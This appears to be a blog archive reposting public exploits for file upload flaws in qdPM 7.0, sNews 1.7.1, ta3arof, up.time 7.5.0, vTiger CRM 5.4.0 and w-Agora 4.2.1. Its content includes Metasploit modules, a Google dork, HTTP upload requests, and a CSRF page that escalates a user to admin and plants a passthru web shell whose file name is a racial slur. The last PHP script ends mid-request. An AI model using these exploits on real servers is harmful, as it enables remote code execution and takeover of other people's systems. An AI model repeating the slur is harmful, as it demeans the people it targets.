Minggu, 20 Mei 2018

qdPM 7.0 - Arbitrary '.PHP' File Upload

 Image result for qdPM 7.0 - Arbitrary '.PHP' File Upload

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::EXE

    def initialize(info={})
        super(update_info(info,
            'Name'           => "qdPM v7 Arbitrary PHP File Upload Vulnerability",
            'Description'    => %q{
                This module exploits a vulnerability found in qdPM - a web-based project management
                software. The user profile's photo upload feature can be abused to upload any
                arbitrary file onto the victim server machine, which allows remote code execution.
                Please note in order to use this module, you must have a valid credential to sign
                in.
            },
            'License'        => MSF_LICENSE,
            'Author'         =>
                [
                    'loneferret', #Discovery, PoC
                    'sinn3r'      #Metasploit
                ],
            'References'     =>
                [
                    ['OSVDB', '82978'],
                    ['EDB', '19154']
                ],
            'Payload'        =>
                {
                    'BadChars' => "\x00"
                },
            'DefaultOptions'  =>
                {
                    'ExitFunction' => "none"
                },
            'Platform'       => ['linux', 'php'],
            'Targets'        =>
                [
                    [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' }  ],
                    [ 'Linux x86'            , { 'Arch' => ARCH_X86, 'Platform' => 'linux'} ]
                ],
            'Privileged'     => false,
            'DisclosureDate' => "Jun 14 2012",
            'DefaultTarget'  => 0))

        register_options(
            [
                OptString.new('TARGETURI', [true, 'The base directory to sflog!', '/qdPM/']),
                OptString.new('USERNAME',  [true, 'The username to login with']),
                OptString.new('PASSWORD',  [true, 'The password to login with'])
            ], self.class)
    end

    def check
        target_uri.path << '/' if target_uri.path[-1,1] != '/'
        base = File.dirname("#{target_uri.path}.")

        res = send_request_raw({'uri'=>"#{base}/index.php"})
        if res and res.body =~ /<div id\=\"footer\"\>.+qdPM ([\d])\.([\d]).+\<\/div\>/m
            major, minor = $1, $2
            return Exploit::CheckCode::Vulnerable if (major+minor).to_i <= 70
        end

        return Exploit::CheckCode::Safe
    end

    def get_write_exec_payload(fname, data)
        p = Rex::Text.encode_base64(generate_payload_exe)
        php = %Q|
        <?php
        $f = fopen("#{fname}", "wb");
        fwrite($f, base64_decode("#{p}"));
        fclose($f);
        exec("chmod 777 #{fname}");
        exec("#{fname}");
        ?>
        |
        php = php.gsub(/^\t\t/, '').gsub(/\n/, ' ')
        return php
    end

    def on_new_session(cli)
        if cli.type == "meterpreter"
            cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi")
        end

        @clean_files.each do |f|
            print_status("#{@peer} - Removing: #{f}")
            begin
                if cli.type == 'meterpreter'
                    cli.fs.file.rm(f)
                else
                    cli.shell_command_token("rm #{f}")
                end
            rescue ::Exception => e
                print_error("#{@peer} - Unable to remove #{f}: #{e.message}")
            end
        end
    end

    def login(base, username, password)
        # Login
        res = send_request_cgi({
            'method'    => 'POST',
            'uri'       => "#{base}/index.php/home/login",
            'vars_post' => {
                'login[email]'    => username,
                'login[password]' => password,
                'http_referer'    => ''
            },
            # This needs to be set, otherwise we get two cookies... I don't need two cookies.
            'cookie'     => "qdpm=#{Rex::Text.rand_text_alpha(27)}",
            'headers'   => {
                'Origin' => "http://#{rhost}",
                'Referer' => "http://#{rhost}/#{base}/index.php/home/login"
            }
        })

        cookie = (res and res.headers['Set-Cookie'] =~ /qdpm\=.+\;/) ? res.headers['Set-Cookie'] : ''
        return {} if cookie.empty?
        cookie = cookie.to_s.scan(/(qdpm\=\w+)\;/).flatten[0]

        # Get user data
        vprint_status("#{@peer} - Enumerating user data")
        res = send_request_raw({
            'uri' => "#{base}/index.php/home/myAccount",
            'cookie' => cookie
        })

        return {} if not res
        if res.code == 404
            print_error("#{@peer} - #{username} does not actually have a 'myAccount' page")
            return {}
        end

        b = res.body

        user_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[id\]\" value\=\"(.+)\" id\=\"users\_id\" \/\>/).flatten[0] || ''
        group_id = b.scan(/\<input type\=\"hidden\" name\=\"users\[users\_group\_id\]\" value\=\"(.+)\" id\=\"users\_users\_group\_id\" \/>/).flatten[0] || ''
        user_active = b.scan(/\<input type\=\"hidden\" name\=\"users\[active\]\" value\=\"(.+)\" id\=\"users\_active\" \/\>/).flatten[0] || ''

        opts = {
            'cookie'     => cookie,
            'user_id'     => user_id,
            'group_id'    => group_id,
            'user_active' => user_active
        }

        return opts
    end

    def upload_php(base, opts)
        fname       = opts['filename']
        php_payload = opts['data']
        user_id     = opts['user_id']
        group_id    = opts['group_id']
        user_active = opts['user_active']
        username    = opts['username']
        email       = opts['email']
        cookie      = opts['cookie']

        data = Rex::MIME::Message.new
        data.add_part('UsersAccountForm', nil, nil, 'form-data; name="formName"')
        data.add_part('put', nil, nil, 'form-data; name="sf_method"')
        data.add_part(user_id, nil, nil, 'form-data; name="users[id]"')
        data.add_part(group_id, nil, nil, 'form-data; name="users[users_group_id]"')
        data.add_part(user_active, nil, nil, 'form-data; name="users[active]"')
        data.add_part('', nil, nil, 'form-data; name="users[skin]"')
        data.add_part(username, nil, nil, 'form-data; name="users[name]"')
        data.add_part(php_payload, nil, nil, "form-data; name=\"users[photo]\"; filename=\"#{fname}\"")
        data.add_part('', nil, nil, 'form-data; name="preview_photo"')
        data.add_part(email, nil, nil, 'form-data; name="users[email]"')
        data.add_part('en_US', nil, nil, 'form-data; name="users[culture]"')
        data.add_part('', nil, nil, 'form-data; name="new_password"')

        post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

        res = send_request_cgi({
            'method'  => 'POST',
            'uri'     => "#{base}/index.php/home/myAccount",
            'ctype'   => "multipart/form-data; boundary=#{data.bound}",
            'data'    => post_data,
            'cookie'  => cookie,
            'headers' => {
                'Origin' => "http://#{rhost}",
                'Referer' => "http://#{rhost}#{base}/index.php/home/myAccount"
            }
        })

        return (res and res.headers['Location'] =~ /home\/myAccount$/) ? true : false
    end

    def exec_php(base, opts)
        cookie = opts['cookie']

        # When we upload a file, it will be renamed. The 'myAccount' page has that info.
        res = send_request_cgi({
            'uri'    => "#{base}/index.php/home/myAccount",
            'cookie' => cookie
        })

        if not res
            print_error("#{@peer} - Unable to request the file")
            return
        end

        fname = res.body.scan(/\<input type\=\"hidden\" name\=\"preview\_photo\" id\=\"preview\_photo\" value\=\"(\d+\-\w+\.php)\" \/\>/).flatten[0] || ''
        if fname.empty?
            print_error("#{@peer} - Unable to extract the real filename")
            return
        end

        # Now that we have the filename, request it
        print_status("#{@peer} - Uploaded file was renmaed as '#{fname}'")
        send_request_raw({'uri'=>"#{base}/uploads/users/#{fname}"})
        handler
    end

    def exploit
        @peer = "#{rhost}:#{rport}"

        target_uri.path << '/' if target_uri.path[-1,1] != '/'
        base = File.dirname("#{target_uri.path}.")

        user = datastore['USERNAME']
        pass = datastore['PASSWORD']
        print_status("#{@peer} - Attempt to login with '#{user}:#{pass}'")
        opts = login(base, user, pass)
        if opts.empty?
            print_error("#{@peer} - Login unsuccessful")
            return
        end

        php_fname = "#{Rex::Text.rand_text_alpha(5)}.php"
        @clean_files = [php_fname]

        case target['Platform']
        when 'php'
            p = "<?php #{payload.encoded} ?>"
        when 'linux'
            bin_name = "#{Rex::Text.rand_text_alpha(5)}.bin"
            @clean_files << bin_name
            bin = generate_payload_exe
            p = get_write_exec_payload("/tmp/#{bin_name}", bin)
        end

        print_status("#{@peer} - Uploading PHP payload (#{p.length.to_s} bytes)...")
        opts = opts.merge({
            'username' => user.scan(/^(.+)\@.+/).flatten[0] || '',
            'email'    => user,
            'filename' => php_fname,
            'data'     => p
        })
        uploader = upload_php(base, opts)
        if not uploader
            print_error("#{@peer} - Unable to upload")
            return
        end

        print_status("#{@peer} - Executing '#{php_fname}'")
        exec_php(base, opts)
    end
end

Minggu, 25 Maret 2018

sNews 1.7.1

sNews 1.7.1





# Exploit Title : Snews CMS upload sheller
# Author : Ashiyane Digital Security Team
# Google Dork : "This site is powered by sNews"
# Date :  04/11/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://snewscms.com/
# Software link : http://snewscms.com/download/snews1.7.1.zip
# Version : 1.7(latest)
#######################################################3
need admin access for upload files but we can upload any file  without
bypass(.php,.exe,....)
1-goto http://SiteName/snews_files/
2- click on Browse botton and select you`re file
3- click on upload
sheller path is :
http://SiteName/shell.php

poc url:
http://localhost/snews_files/

Poc header:

Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/snews_files/
Cookie: PHPSESSID=am9ffv1sg2kjkfnaku69tfgsu5
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data;
boundary=---------------------------92741037415004
Content-Length: 665

-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="upload_dir"\r\n
\r\n
.\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="imagefile"; filename="shell.php"\r\n
Content-Type: application/\r\n
\r\n
<?php phpinfo ?><br>\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="ip"\r\n
\r\n
127.0.0.1\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="time"\r\n
\r\n
1478199661\r\n
-----------------------------92741037415004\r\n
Content-Disposition: form-data; name="upload"\r\n
\r\n
Upload\r\n
-----------------------------92741037415004--\r\n

Sabtu, 24 Maret 2018

ta3arof [dating]

ta3arof [dating]




| # Exploit  :
|
| 1- http://server/ta3arof/add.php *Register
|
| 2- Up your Ev!l
|
| 3- fin it there
| http://server/ta3arof/members/uploads/
| http://server/ta3arof/members/uploads/1039708483/c.php

Jumat, 23 Maret 2018

up.time 7.5.0

up.time 7.5.0




<html>
 <head>
 <title>Uptime Exploit</title>
 </head>

<body onload="runme();">


<!-- Login -->
<form name="login" action="http://127.0.0.1:9999/index.php" method="POST" target="frame0">
      <input type="hidden" name="username" value="sample" />
      <input type="hidden" name="password" value="123456" />
    </form>

<!-- Escalate privileges -->
   <form name="privadm" action="http://127.0.0.1:9999/main.php?section=UserContainer&subsection=edit&id=2" method="POST" target="frame1">
      <input type="hidden" name="operation" value="submit" />
      <input type="hidden" name="disableEditOfUsernameRoleGroup" value="false" />
      <input type="hidden" name="username" value="sample" />
      <input type="hidden" name="password" value="123456" />
      <input type="hidden" name="passwordConfirm" value="123456" />
      <input type="hidden" name="firstname" value="Sample" />
      <input type="hidden" name="lastname" value="User" />
      <input type="hidden" name="location" value="" />
      <input type="hidden" name="emailaddress" value="" />
      <input type="hidden" name="emailtimeperiodid" value="1" />
      <input type="hidden" name="phonenumber" value="" />
      <input type="hidden" name="phonenumbertimeperiodid" value="1" />
      <input type="hidden" name="windowshost" value="" />
      <input type="hidden" name="windowsworkgroup" value="" />
      <input type="hidden" name="windowspopuptimeperiodid" value="1" />
      <input type="hidden" name="landingpage" value="MyPortal" />
      <input type="hidden" name="isonvacation" value="0" />
      <input type="hidden" name="receivealerts" value="0" />
      <input type="hidden" name="activexgraphs" value="0" />
      <input type="hidden" name="newuser" value="on" />
      <input type="hidden" name="newuser" value="1" />
      <input type="hidden" name="userroleid" value="1" />
      <input type="hidden" name="usergroupid&#91;&#93;" value="1" />
    </form>

<!-- Log-off to refresh permission -->
    <form name="logoff" action="http://127.0.0.1:9999/main.php" method="POST" target="frame2">
      <input type="hidden" name="logout" value="1" />
    </form>

<!-- Login with escalated user -->
    <form name="login2" action="http://127.0.0.1:9999/index.php?loggedout" method="POST" target="frame3">
      <input type="hidden" name="username" value="sample" />
      <input type="hidden" name="password" value="123456" />
    </form>

<!-- Creating Monitor to  rename php shell -->
<form  name="createmonitor" action="http://127.0.0.1:9999/main.php?section=ERDCInstance&subsection=add" method="POST" target="frame4">
      <input type="hidden" name="initialERDCId" value="20" />
      <input type="hidden" name="target" value="1" />
      <input type="hidden" name="targetType" value="systemList" />
      <input type="hidden" name="systemList" value="1" />
      <input type="hidden" name="serviceGroupList" value="&#45;10" />
      <input type="hidden" name="initialMode" value="standard" />
      <input type="hidden" name="erdcName" value="Exploit" />
      <input type="hidden" name="erdcInitialName" value="" />
      <input type="hidden" name="erdcDescription" value="Exploit" />
      <input type="hidden" name="hostButton" value="system" />
      <input type="hidden" name="erdc&#95;id" value="20" />
      <input type="hidden" name="forceReload" value="0" />
      <input type="hidden" name="operation" value="standard" />
      <input type="hidden" name="erdc&#95;instance&#95;id" value="" />
      <input type="hidden" name="label&#95;&#91;184&#93;" value="Script&#32;Name" />
      <input type="hidden" name="value&#95;&#91;184&#93;" value="c&#58;&#92;windows&#92;system32&#92;cmd&#46;exe" />
      <input type="hidden" name="id&#95;&#91;184&#93;" value="process" />
      <input type="hidden" name="name&#95;&#91;process&#93;" value="184" />
      <input type="hidden" name="units&#95;&#91;184&#93;" value="" />
      <input type="hidden" name="guiBasic&#95;&#91;184&#93;" value="1" />
      <input type="hidden" name="inputType&#95;&#91;184&#93;" value="GUIString" />
      <input type="hidden" name="screenOrder&#95;&#91;184&#93;" value="1" />
      <input type="hidden" name="parmType&#95;&#91;184&#93;" value="1" />
      <input type="hidden" name="label&#95;&#91;185&#93;" value="Arguments" />
      <input type="hidden" name="value&#95;&#91;185&#93;" value="&#32;&#47;C&#32;ren&#32;"C&#58;&#92;Program&#32;Files&#92;uptime&#32;software&#92;uptime&#92;GUI&#92;wizards&#92;nigga&#46;txt"&#32;"nigga&#46;php"&#32;" />
      <input type="hidden" name="id&#95;&#91;185&#93;" value="args" />
      <input type="hidden" name="name&#95;&#91;args&#93;" value="185" />
      <input type="hidden" name="units&#95;&#91;185&#93;" value="" />
      <input type="hidden" name="guiBasic&#95;&#91;185&#93;" value="1" />
      <input type="hidden" name="inputType&#95;&#91;185&#93;" value="GUIString" />
      <input type="hidden" name="screenOrder&#95;&#91;185&#93;" value="2" />
      <input type="hidden" name="parmType&#95;&#91;185&#93;" value="1" />
      <input type="hidden" name="label&#95;&#91;187&#93;" value="Output" />
      <input type="hidden" name="can&#95;retain&#95;&#91;187&#93;" value="false" />
      <input type="hidden" name="comparisonWarn&#95;&#91;187&#93;" value="&#45;1" />
      <input type="hidden" name="comparison&#95;&#91;187&#93;" value="&#45;1" />
      <input type="hidden" name="id&#95;&#91;187&#93;" value="value&#95;critical&#95;output" />
      <input type="hidden" name="name&#95;&#91;output&#93;" value="187" />
      <input type="hidden" name="units&#95;&#91;187&#93;" value="" />
      <input type="hidden" name="guiBasic&#95;&#91;187&#93;" value="1" />
      <input type="hidden" name="inputType&#95;&#91;187&#93;" value="GUIString" />
      <input type="hidden" name="screenOrder&#95;&#91;187&#93;" value="4" />
      <input type="hidden" name="parmType&#95;&#91;187&#93;" value="2" />
      <input type="hidden" name="label&#95;&#91;189&#93;" value="Response&#32;time" />
      <input type="hidden" name="can&#95;retain&#95;&#91;189&#93;" value="false" />
      <input type="hidden" name="comparisonWarn&#95;&#91;189&#93;" value="&#45;1" />
      <input type="hidden" name="comparison&#95;&#91;189&#93;" value="&#45;1" />
      <input type="hidden" name="id&#95;&#91;189&#93;" value="value&#95;critical&#95;timer" />
      <input type="hidden" name="name&#95;&#91;timer&#93;" value="189" />
      <input type="hidden" name="units&#95;&#91;189&#93;" value="ms" />
      <input type="hidden" name="guiBasic&#95;&#91;189&#93;" value="0" />
      <input type="hidden" name="inputType&#95;&#91;189&#93;" value="GUIInteger" />
      <input type="hidden" name="screenOrder&#95;&#91;189&#93;" value="6" />
      <input type="hidden" name="parmType&#95;&#91;189&#93;" value="2" />
      <input type="hidden" name="timing&#95;&#91;erdc&#95;instance&#95;monitored&#93;" value="1" />
      <input type="hidden" name="timing&#95;&#91;timeout&#93;" value="60" />
      <input type="hidden" name="timing&#95;&#91;check&#95;interval&#93;" value="10" />
      <input type="hidden" name="timing&#95;&#91;recheck&#95;interval&#93;" value="1" />
      <input type="hidden" name="timing&#95;&#91;max&#95;rechecks&#93;" value="3" />
      <input type="hidden" name="alerting&#95;&#91;notification&#93;" value="1" />
      <input type="hidden" name="alerting&#95;&#91;alert&#95;interval&#93;" value="120" />
      <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;critical&#93;" value="1" />
      <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;warning&#93;" value="1" />
      <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;recovery&#93;" value="1" />
      <input type="hidden" name="alerting&#95;&#91;alert&#95;on&#95;unknown&#93;" value="1" />
      <input type="hidden" name="time&#95;period&#95;id" value="1" />
      <input type="hidden" name="pageFinish" value="Finish" />
      <input type="hidden" name="pageContinue" value="Continue&#46;&#46;&#46;" />
      <input type="hidden" name="isWizard" value="1" />
      <input type="hidden" name="wizardPage" value="2" />
      <input type="hidden" name="wizardNumPages" value="2" />
      <input type="hidden" name="wizardTask" value="pageFinish" />
      <input type="hidden" name="visitedPage&#91;1&#93;" value="1" />
      <input type="hidden" name="visitedPage&#91;2&#93;" value="1" />
         </form>


<!-- Uploading php shell txt format -->
    <form name="uploadshell" action="http://127.0.0.1:9999/wizards/post2file.php" method="POST" target="frame5">
      <input type="hidden" name="file&#95;name" value="nigga&#46;txt" />
      <input type="hidden" name="script" value="<&#63;&#32;passthru&#40;&#36;&#95;GET&#91;&apos;cmd&apos;&#93;&#41;&#59;&#32;&#63;>" />
         </form>


<!-- Run command to rename php shell -->
    <form name="run" action="http://127.0.0.1:9999/main.php" method="POST" target="frame6">
      <input type="hidden" name="section" value="RunERDCInstance" />
      <input type="hidden" name="subsection" value="view" />
      <input type="hidden" name="id" value="65535" />
      <input type="hidden" name="name" value="Exploit" />
    </form>


<!-- Executing basic command -->
    <form name="exploit" action="http://127.0.0.1:9999/wizards/nigga.php" METHOD="GET" target="frame7">
    <input type="hidden" name="cmd" value="whoami" />
    </form>


<iframe name="frame0"></iframe>
<iframe name="frame1"></iframe>
<iframe name="frame2"></iframe>
<iframe name="frame3"></iframe>
<iframe name="frame4"></iframe>
<iframe name="frame5"></iframe>
<iframe name="frame6"></iframe>
<iframe name="frame7"></iframe>

<script>
 function runme()
 {
 document.login.submit();
 document.getElementsByTagName("iframe")[0].onload = function()
//document.write("Login....")
 {
document.privadm.submit();
document.getElementsByTagName("iframe")[1].onload = function()
//document.write("Mutating to admin uahsuasuas");
 {
document.logoff.submit();
document.getElementsByTagName("iframe")[2].onload = function()
//document.write("Refreshing perms...");
 {
document.login2.submit();
document.getElementsByTagName("iframe")[3].onload = function()
//document.write("Login again...Keep Calm....");
 {
document.createmonitor.submit();
document.getElementsByTagName("iframe")[4].onload = function()
//document.write("Creating F*cking monitor");
 {
document.uploadshell.submit();
document.getElementsByTagName("iframe")[5].onload = function()
//document.write("Uploading webshell. Muaaaaa! Muaaaaa!!");
 {
document.run.submit();
document.getElementsByTagName("iframe")[6].onload = function()
//document.write("Trick to shell... come on....");
 {
document.exploit.submit();
document.getElementsByTagName("iframe")[7].onload = function()
alert('Pwned!!!!!!!!!!!!!!!!!!!!!!')
 }
 }
 }
 }
 }
 }
 }
 }
</script>

</body>
</html>

Kamis, 22 Maret 2018

vTiger CRM 5.4.0 SOAP

vTiger CRM 5.4.0 SOAP 




require 'msf/core'
require 'rexml/document'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include REXML
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload',
      'Description'    => %q{
          vTiger CRM allows an user to bypass authentication when requesting SOAP services.
          In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP
          service. By combining both vulnerabilities an attacker can upload and execute PHP
          code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu
          10.04 and Windows 2003 SP2.
        },
      'Author'         =>
        [
          'Egidio Romano', # Vulnerability discovery
          'juan vazquez' # msf module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-3214' ],
          [ 'CVE', '2013-3215' ],
          [ 'OSVDB', '95902' ],
          [ 'OSVDB', '95903' ],
          [ 'BID', '61558' ],
          [ 'BID', '61559' ],
          [ 'EDB', '27279' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-07' ],
          [ 'URL', 'http://karmainsecurity.com/KIS-2013-08' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          # Arbitrary big number. The payload is sent base64 encoded
          # into a POST SOAP request
          'Space'       => 262144, # 256k
          'DisableNops' => true
        },
      'Targets' =>
        [
          [ 'vTigerCRM v5.4.0', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2013'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base vTiger CRM directory path", '/vtigercrm/'])
      ], self.class)
  end

  def check
    test_one = check_email_soap("admin", rand_text_alpha(4 + rand(4)))
    res = send_soap_request(test_one)

    unless res and res.code == 200 and res.body.to_s =~ /<return xsi:nil="true" xsi:type="xsd:string"\/>/
      return Exploit::CheckCode::Unknown
    end

    test_two = check_email_soap("admin")
    res = send_soap_request(test_two)

    if res and res.code == 200 and (res.body.blank? or res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/)
      return Exploit::CheckCode::Vulnerable
    end

    return Exploit::CheckCode::Safe
  end

  def exploit
    file_name = rand_text_alpha(rand(10)+6) + '.php'
    php = %Q|<?php #{payload.encoded} ?>|

    soap = add_attachment_soap(file_name, php)
    res = send_soap_request(soap)

    print_status("#{peer} - Uploading payload...")
    if res and res.code == 200 and res.body.to_s =~ /<return xsi:type="xsd:string">.*<\/return>/
      print_good("#{peer} - Upload successfully uploaded")
      register_files_for_cleanup(file_name)
    else
      fail_with(Failure::Unknown, "#{peer} - Upload failed")
    end

    print_status("#{peer} - Executing payload...")
    send_request_cgi({'uri' => normalize_uri(target_uri.path, 'soap', file_name)}, 0)
  end

  def add_attachment_soap(file_name, file_data)
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:crm'     => "http://www.vtiger.com/products/crm"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      "crm:AddEmailAttachment",
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    crm = body.elements[1]
    crm.add_element("emailid", {'xsi:type' => 'xsd:string'})
    crm.add_element("filedata", {'xsi:type' => 'xsd:string'})
    crm.add_element("filename", {'xsi:type' => 'xsd:string'})
    crm.add_element("filesize", {'xsi:type' => 'xsd:string'})
    crm.add_element("filetype", {'xsi:type' => 'xsd:string'})
    crm.add_element("username", {'xsi:type' => 'xsd:string'})
    crm.add_element("session", {'xsi:type' => 'xsd:string'})
    crm.elements['emailid'].text = rand_text_alpha(4+rand(4))
    crm.elements['filedata'].text = "MSF_PAYLOAD"
    crm.elements['filename'].text = "MSF_FILENAME"
    crm.elements['filesize'].text = file_data.length.to_s
    crm.elements['filetype'].text = "php"
    crm.elements['username'].text = rand_text_alpha(4+rand(4))

    xml_string = xml.to_s
    xml_string.gsub!(/MSF_PAYLOAD/, Rex::Text.encode_base64(file_data))
    xml_string.gsub!(/MSF_FILENAME/, "../../../../../../#{file_name}")

    return xml_string
  end

  def check_email_soap(user_name = "", session = "")
    xml = Document.new
    xml.add_element(
      "soapenv:Envelope",
      {
        'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
        'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
        'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
        'xmlns:crm'     => "http://www.vtiger.com/products/crm"
      })
    xml.root.add_element("soapenv:Header")
    xml.root.add_element("soapenv:Body")
    body = xml.root.elements[2]
    body.add_element(
      "crm:CheckEmailPermission",
      {
        'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/"
      })
    crm = body.elements[1]
    crm.add_element("username", {'xsi:type' => 'xsd:string'})
    crm.add_element("session", {'xsi:type' => 'xsd:string'})
    crm.elements['username'].text = user_name
    crm.elements['session'].text = session

    xml.to_s
  end

  def send_soap_request(soap_data)
    res = send_request_cgi({
      'uri'      => normalize_uri(target_uri.path, 'soap', 'vtigerolservice.php'),
      'method'   => 'POST',
      'ctype'    => 'text/xml; charset=UTF-8',
      'data'     => soap_data
    })

    return res
  end

end

Rabu, 21 Maret 2018

w-Agora Forum 4.2.1 - Arbitrary File Upload

w-Agora Forum 4.2.1 - Arbitrary File Upload
<?php
/*
Title .......................: w-Agora Forum 4.2.1 Remote File Upload Exploit
Site ........................: http://www.w-agora.com/en/download.php
Version .....................:  4.2.1


Author ......................: Treasure Priyamal
Site ........................: http://treasuresec.com
E-mail ......................: treasure[at]treasuresec.com

Discription
===========
w-Agora avatar upload option has content file detect option , but it can be replace with simply editing
POST Request from your browser

Here is a dump from Temp-Data I editied while im upload the File. Just simply replacing the Content-Type
you will be able to upload your script


6:28:18.073[118ms][total 3862ms] Status: 200[OK]
POST http://localhost/w-agora/browse_avatar.php Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Content Size[-1] Mime Type[text/html]
   Request Headers:
      Host[localhost]
      User-Agent[Mozilla/5.0 (Windows NT 5.1; rv:2.0.1) Gecko/20100101 Firefox/4.0.1]
      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,/*;q=0.8]
      Accept-Language[en-us,en;q=0.5]
      Accept-Encoding[gzip, deflate]
      Accept-Charset[ISO-8859-1,utf-8;q=0.7,*;q=0.7]
      Keep-Alive[115]
      Connection[keep-alive]
      Referer[http://localhost/w-agora/browse_avatar.php?site=localhost]
      Cookie[wa_lang=en; WAS_localhost_test=LastVisit%3D1306715684%26ThisVisit%3D1306715918%26visited%3D1306672722%2B; WAP_localhost_test=Visits%3D1%26LastVisit%3D1306715684; localhost_test_sort=newest; WAP_localhost_auth=lastVisit%3D1306715682%26uid%3Dtest%26pw%3D098f6bcd4621d373cade4e832627b4f6; localhost_auth=lastVisit%3D1306715998%26uid%3Dtest%26pw%3D098f6bcd4621d373cade4e832627b4f6]
   Post Data:
      POST_DATA[-----------------------------76401208715012
Content-Disposition: form-data; name="site"

localhost
-----------------------------76401208715012
Content-Disposition: form-data; name="submitted"

true
-----------------------------76401208715012
Content-Disposition: form-data; name="perpage"

20
-----------------------------76401208715012
Content-Disposition: form-data; name="first"

0
-----------------------------76401208715012
Content-Disposition: form-data; name="avatar"; filename="echo.php"
Content-Type: image/jpeg\

<?php phpinfo(); ?>

-----------------------------76401208715012
Content-Disposition: form-data; name="submit"

Copy file
-----------------------------76401208715012--
]
   Response Headers:
      Date[Mon, 30 May 2011 00:58:18 GMT]
      Server[Apache/2.2.11 (Win32) PHP/5.3.0]
      X-Powered-By[PHP/5.3.0]
      Keep-Alive[timeout=5, max=100]
      Connection[Keep-Alive]
      Transfer-Encoding[chunked]
      Content-Type[text/html]




*/

if(count($argv) == 5)
{
    echo "\n\n";
    echo "+---------------------------------------------------------------+\r\n";
    echo "|        w-Agora Forum 4.2.1 Remote File Upload Exploit           |\r\n";
    echo "|                   Treasure Security                           |\r\n";
    echo "|                 by Treasure Priyamal                           |\r\n";
    echo "|        Usage: php exploit.php site.com /path/ user pass        |\r\n";
    echo "+---------------------------------------------------------------+\r\n";
    echo "\n";
        
    echo "Code to write in the file (ie. <?php phpinfo(); ?>) :\r\n\n";
    $code     =   trim(fgets(STDIN));
    
    $socket   =   @fsockopen($argv[1], 80, $eno, $estr, 30);
    if(!$socket)
    {
        die("Could not connect to ".$argv[1].". Operation aborted.");
    }
    
    $part1      =   "POST http://192.168.1.101/w-agora/browse_avatar.php?site=localhost HTTP/1.1\r\n";
    $part1     .=   "Host: " . $argv[1] . "\r\n";
    $part1     .=   "User-Agent : Mozilla/5.0 (X11; Linux i686; rv:2.0.1) Gecko/20100101 Firefox/4.0.1\r\n";
    $part1     .=   "Accept : text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
    $part1     .=   "Connection: keep-alive\r\n";
    $part1     .=   "Accept-Language : en-us,en;q=0.5\r\n";
    $part1     .=   "Referer :localhost/w-agora/browse_avatar.php?site=localhost\r\n";
    $part1     .=   "Cookie : wa_lang=en\r\n";


    $part1     .=   "Content-Type : multipart/form-data; boundary=---------------------------14695017222113685839218008876\r\n";
    $part2      =   "-----------------------------14695017222113685839218008876\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"site\"\r\n";
    $part2     .=   "localhost\r\n";
    $part2     .=   "-----------------------------14695017222113685839218008876\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"submitted\"\r\n";
    $part2     .=   "true\r\n";
    $part2     .=   "-----------------------------14695017222113685839218008876\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"perpage\"\r\n";
    $part2     .=   "20\r\n";
    $part2     .=   "-----------------------------14695017222113685839218008876\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"first\"\r\n";
    $part2     .=   "0\r\n";
    $part2     .=   "-----------------------------14695017222113685839218008876\r\n";
    $part2     .=   "Content-Disposition: form-data; name=\"avatar\"; filename=\"file.php\"\r\n";
    $part2     .=   "Content-Type: image/gif\r\n";    // this is where the magic happens
